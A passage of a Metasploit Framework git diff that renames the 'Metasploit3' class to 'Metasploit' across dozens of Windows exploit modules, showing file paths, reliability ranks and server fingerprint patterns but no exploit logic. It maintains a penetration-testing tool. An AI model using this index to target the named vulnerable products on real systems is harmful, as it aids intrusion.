Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index e5dc86d847..c6ec9c7138 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index c586e98158..1f855b02e8 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 0d3a53e3de..fe5dce64fc 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index 88bd797a13..31ca7dbe5a 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking # XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] } diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index 7336b28f7b..e70b6fbb89 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index 074f885b40..9070e34a12 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 4f305e2f1a..90e04942ef 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 689f107920..7655b95d15 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index 3569fe8827..a52dc9b945 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index ee569d496f..1a8369647b 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index 64898f93cc..987ecc04c7 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'. diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index ac84d2ff34..a0b1c01133 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'. diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 2119b57aab..31789b34a4 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index 6cf9e98863..6e1db8e6e2 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index df52e63683..5b6609255f 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb index a314fa36cf..cd7f809655 100644 --- a/modules/exploits/windows/http/belkin_bulldog.rb +++ b/modules/exploits/windows/http/belkin_bulldog.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb index 9f5251b4e1..3151a53bbb 100644 --- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb +++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index c2bb5bdf61..437bb30d01 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb index bc48f73fd8..99552155f3 100644 --- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb +++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb index d9efe9d560..3c4d145359 100644 --- a/modules/exploits/windows/http/cogent_datahub_command.rb +++ b/modules/exploits/windows/http/cogent_datahub_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote # Exploitation is reliable, but the service hangs and needs manual restarting. Rank = ManualRanking diff --git a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb index e0865db4c7..c1484102f6 100644 --- a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb +++ b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/coldfusion_fckeditor.rb b/modules/exploits/windows/http/coldfusion_fckeditor.rb index 769d496259..fd4dfa6a5a 100644 --- a/modules/exploits/windows/http/coldfusion_fckeditor.rb +++ b/modules/exploits/windows/http/coldfusion_fckeditor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index a0747c46a7..9b5d2b1bb7 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 5525b7fb10..a794a81776 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb index 079cdae430..47af2229a2 100644 --- a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index c7ef5b6ee7..4bfa7a8e37 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] } diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index 7daa7bff70..91c9c9bae5 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index ff37a76faa..77254a164b 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 853bc561cd..2bfb24ab2b 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] } diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb index c71ee36629..5e61f86a37 100644 --- a/modules/exploits/windows/http/efs_fmws_userid_bof.rb +++ b/modules/exploits/windows/http/efs_fmws_userid_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking # Reliable memory corruption include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ektron_xslt_exec.rb b/modules/exploits/windows/http/ektron_xslt_exec.rb index 3288d2c0d2..f79dec147a 100644 --- a/modules/exploits/windows/http/ektron_xslt_exec.rb +++ b/modules/exploits/windows/http/ektron_xslt_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb index a770467975..4713a5d31f 100644 --- a/modules/exploits/windows/http/ericom_access_now_bof.rb +++ b/modules/exploits/windows/http/ericom_access_now_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ezserver_http.rb b/modules/exploits/windows/http/ezserver_http.rb index 772d2e31aa..9645d8a39f 100644 --- a/modules/exploits/windows/http/ezserver_http.rb +++ b/modules/exploits/windows/http/ezserver_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 6a396493ac..6e95c2d915 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # w/auth required: [*] x.x.x.x ( 401-Basic realm="FDM Remote control server" ) diff --git a/modules/exploits/windows/http/generic_http_dll_injection.rb b/modules/exploits/windows/http/generic_http_dll_injection.rb index 949c22a1e0..383968979b 100644 --- a/modules/exploits/windows/http/generic_http_dll_injection.rb +++ b/modules/exploits/windows/http/generic_http_dll_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index 82245bab7a..421f5f2d31 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb index eb447a6e35..5ed6e65568 100644 --- a/modules/exploits/windows/http/hp_imc_bims_upload.rb +++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index f3366ccfbd..945a961292 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index a41ebf45b8..39313f83f7 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } diff --git a/modules/exploits/windows/http/hp_mpa_job_acct.rb b/modules/exploits/windows/http/hp_mpa_job_acct.rb index 65ba7b2ac3..d54885e133 100644 --- a/modules/exploits/windows/http/hp_mpa_job_acct.rb +++ b/modules/exploits/windows/http/hp_mpa_job_acct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb index 4662a10c1d..9c4916ec4a 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb index acc7ebc703..d3a3355723 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb index 87bf5d4ac7..6a0fedbc71 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index 5b04429e57..a8af4e37de 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index 5a5e8f9e58..5ea29a53ac 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index 303a6aa930..19fefd1ca5 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 867dd837c6..c6e96bee4e 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index c0c7a84d27..318d8a1d66 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking # =( need more targets and perhaps more OS specific return values OS specific would be preferred diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index e9e798f40f..8666f9ebeb 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index f546994531..e0cdf627a3 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb index 5b2d8df90d..6aca10de0c 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb index e653bcf3c1..1eaf093bf8 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index 054d3c4090..cae76b8996 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_snmp.rb b/modules/exploits/windows/http/hp_nnm_snmp.rb index d2c98ea6ba..e593f4abe9 100644 --- a/modules/exploits/windows/http/hp_nnm_snmp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index 18fbdce2b0..cecb0bfa06 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb index e233bfd79b..6ca3cc0383 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 75609ae473..4fe7676f0a 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index 44464a26e7..cbbb02c370 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 5dec29805a..54be7fa00e 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri 